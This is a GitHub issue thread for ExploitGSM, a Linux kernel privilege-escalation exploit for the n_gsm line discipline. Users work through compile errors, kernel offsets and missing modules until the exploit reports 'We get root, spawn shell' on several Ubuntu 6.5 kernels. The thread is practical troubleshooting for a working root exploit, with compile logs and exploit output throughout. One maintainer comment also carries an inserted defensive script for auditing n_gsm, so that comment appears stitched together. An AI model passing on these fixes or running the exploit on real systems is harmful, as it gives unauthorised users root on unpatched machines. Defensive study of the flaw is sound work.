YuriiCrimson / ExploitGSM

Exploit for 6.4 - 6.5 kernels and another exploit for 5.15 - 6.5
MIT License

Compile issue in ubuntu #6

Closed kronostitanplay closed 6 months ago

kronostitanplay commented 6 months ago

Error during make.

error: field ‘config’ has incomplete type
  228 |     struct gsm_dlci_config config;
      |                            ^~~~~~
In file included from /usr/include/x86_64-linux-gnu/asm/ioctl.h:1,
                 from /usr/include/linux/ioctl.h:5,
                 from /usr/include/linux/gsmmux.h:6,
                 from /home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c:7:
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c: In function ‘thread_setconf_dlci’:
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c:54:46: error: invalid application of ‘sizeof’ to incomplete type ‘struct gsm_dlci_config’
   54 | #define GSMIOC_SETCONF_DLCI     _IOW('G', 8, struct gsm_dlci_config)
      |                                              ^~~~~~
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c:1137:42: note: in expansion of macro ‘GSMIOC_SETCONF_DLCI’
 1137 |     args->retval = ioctl(args->fd_input, GSMIOC_SETCONF_DLCI, &args->config);
      |                                          ^~~~~~~~~~~~~~~~~~~
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c: In function ‘thread_getconf_dlci’:
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c:53:47: error: invalid application of ‘sizeof’ to incomplete type ‘struct gsm_dlci_config’
   53 | #define GSMIOC_GETCONF_DLCI     _IOWR('G', 7, struct gsm_dlci_config)
      |                                               ^~~~~~
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c:1146:42: note: in expansion of macro ‘GSMIOC_GETCONF_DLCI’
 1146 |     args->retval = ioctl(args->fd_input, GSMIOC_GETCONF_DLCI, &args->config);
      |                                          ^~~~~~~~~~~~~~~~~~~
gmake[2]: *** [CMakeFiles/ExploitGSM.dir/build.make:76: CMakeFiles/ExploitGSM.dir/main.c.o] Error 1
gmake[1]: *** [CMakeFiles/Makefile2:83: CMakeFiles/ExploitGSM.dir/all] Error 2
faveoled commented 6 months ago

what's your kernel version?

kronostitanplay commented 6 months ago

6.5.0-26-generic #26~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Mar 12 10:22:43 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

xpliz commented 6 months ago

Can't compile in Ubuntu 6.5.0-17 nor 6.5.0-23. Same goes for Debian 12.

Removing the last commit from ./ExploitGSM_6_5/main.c "works", and the exploit compiles but will not run/do anything.

./ExploitGSM ubuntu
Error find kernel 
YuriiCrimson commented 6 months ago

Can't compile in Ubuntu 6.5.0-17 nor 6.5.0-23. Same goes for Debian 12.

Removing the last commit from ./ExploitGSM_6_5/main.c "works", and the exploit compiles but will not run/do anything.

./ExploitGSM ubuntu
Error find kernel 

You should use the offset generator to add the kernel offsets.

faveoled commented 6 months ago

These lines should be replaced with the offset generator output (run it as root; change distro_name as needed): https://github.com/YuriiCrimson/ExploitGSM/blob/0cc21d22ef08c4935d9c0e064f17a2d8fb81dbc4/ExploitGSM_6_5/main.c#L368-L371

Worked on my KDE Neon with the main.c commit reverted:

neon@neon:~/Downloads/ExploitGSM/ExploitGSM_6_5$ ./ExploitGSM ubuntu
permissible spray -> 500 
begin try leak startup_xen! 
startup_xen leaked address  -> ffffffff8ea933a0 
text leaked address         -> ffffffff8c400000 
lockdep_map_size     -> 32 
spinlock_t_size      -> 4 
mutex_size           -> 32 
tty port             -> 376 
tty buffhead         -> 136 
dead                 -> 524 
waiting setconf dlci thread 
Wait 3 sec for ending kernel work execution 
We get root, spawn shell 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@neon:/root# ^C        
neon@neon:~/Downloads/ExploitGSM/ExploitGSM_6_5$ uname -a
Linux neon 6.5.0-21-generic #21~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb  9 13:32:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
kronostitanplay commented 6 months ago

After updating the kernel offset.

permissible spray -> 500 
begin try leak startup_xen! 
startup_xen leaked address  -> ffffffffaaa933a0 
text leaked address         -> ffffffffa8400000 
lockdep_map_size     -> 32 
spinlock_t_size      -> 4 
mutex_size           -> 32 
tty port             -> 376 
tty buffhead         -> 136 
dead                 -> 524 
Error set line discipline N_GSM, Invalid argument 
YuriiCrimson commented 6 months ago

After updating the kernel offset.

permissible spray -> 500 
begin try leak startup_xen! 
startup_xen leaked address  -> ffffffffaaa933a0 
text leaked address         -> ffffffffa8400000 
lockdep_map_size     -> 32 
spinlock_t_size      -> 4 
mutex_size           -> 32 
tty port             -> 376 
tty buffhead         -> 136 
dead                 -> 524 
Error set line discipline N_GSM, Invalid argument 

Because you do not have the n_gsm kernel module. Install the extra kernel modules.
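The "Error set line discipline N_GSM, Invalid argument" above is the TIOCSETD ioctl failing because no n_gsm line discipline could be loaded, so from the defender's side the absence of that module (or a modprobe rule that stops it autoloading) is the precondition worth auditing. The following check is an added example, not code from the ExploitGSM repository; it assumes a Debian/Ubuntu layout with n_gsm.ko (possibly compressed) under /lib/modules/<release>/kernel/drivers/tty/ and rules in /etc/modprobe.d/*.conf.

```shell
#!/bin/sh
# Added example, not from the ExploitGSM repo: report whether the n_gsm
# line discipline (N_GSM = 21) can still be loaded on this host.
# Assumed paths: modules under /lib/modules/<release>/kernel/drivers/tty/,
# modprobe rules under /etc/modprobe.d/*.conf (Debian/Ubuntu layout).
#
# Usage: n_gsm_status MODULE_DIR MODPROBE_D
# Exit status:
#   0  n_gsm.ko not installed: TIOCSETD(N_GSM) fails with EINVAL, which is
#      the error seen in this thread (on Ubuntu it ships in linux-modules-extra)
#   1  installed, but a modprobe rule blocks it ("blacklist n_gsm" stops the
#      kernel's tty-ldisc-21 alias request; "install n_gsm /bin/false" also
#      blocks an explicit modprobe)
#   2  installed and loadable: the precondition the exploit needs is met
n_gsm_status() {
    moddir="$1"
    modprobed="$2"
    ko=$(find "$moddir" -path '*/drivers/tty/*' -name 'n_gsm.ko*' 2>/dev/null | head -n 1)
    if [ -z "$ko" ]; then
        echo "n_gsm: not installed under $moddir"
        return 0
    fi
    rule='^[[:space:]]*(blacklist[[:space:]]+n_gsm|install[[:space:]]+n_gsm[[:space:]]+/bin/(false|true))[[:space:]]*$'
    if grep -Eqs "$rule" "$modprobed"/*.conf; then
        echo "n_gsm: present ($ko) but blocked by a rule in $modprobed"
        return 1
    fi
    echo "n_gsm: present ($ko) and loadable; add 'install n_gsm /bin/false' under $modprobed to disable it"
    return 2
}

# Stand-alone run against the live host; the status is captured so this
# also behaves under 'set -e'.
rc=0
n_gsm_status "/lib/modules/$(uname -r)" /etc/modprobe.d || rc=$?
echo "n_gsm exposure status: $rc"
```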

kronostitanplay commented 6 months ago

After updating the kernel offset.

permissible spray -> 500 
begin try leak startup_xen! 
startup_xen leaked address  -> ffffffffaaa933a0 
text leaked address         -> ffffffffa8400000 
lockdep_map_size     -> 32 
spinlock_t_size      -> 4 
mutex_size           -> 32 
tty port             -> 376 
tty buffhead         -> 136 
dead                 -> 524 
Error set line discipline N_GSM, Invalid argument 

Because you do not have the n_gsm kernel module. Install the extra kernel modules.

Thanks, it works.

permissible spray -> 500 
begin try leak startup_xen! 
startup_xen leaked address  -> ffffffff9e0933a0 
text leaked address         -> ffffffff9ba00000 
lockdep_map_size     -> 32 
spinlock_t_size      -> 4 
mutex_size           -> 32 
tty port             -> 376 
tty buffhead         -> 136 
dead                 -> 524 
waiting setconf dlci thread 
Wait 3 sec for ending kernel work execution 
We get root, spawn shell 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
YuriiCrimson commented 6 months ago

Try my other exploit for Debian 12.

faveoled commented 6 months ago

@kronostitanplay Could you update your system to see if it works on 6.5.0-27?

psreverttoself commented 6 months ago

@kronostitanplay Could you update your system to see if it works on 6.5.0-27?

Hi, I have confirmed this works on Ubuntu 22 LTS with kernel 6.5.0-27.

kronostitanplay commented 6 months ago

@kronostitanplay Could you update your system to see if it works on 6.5.0-27?

Yes! It's working.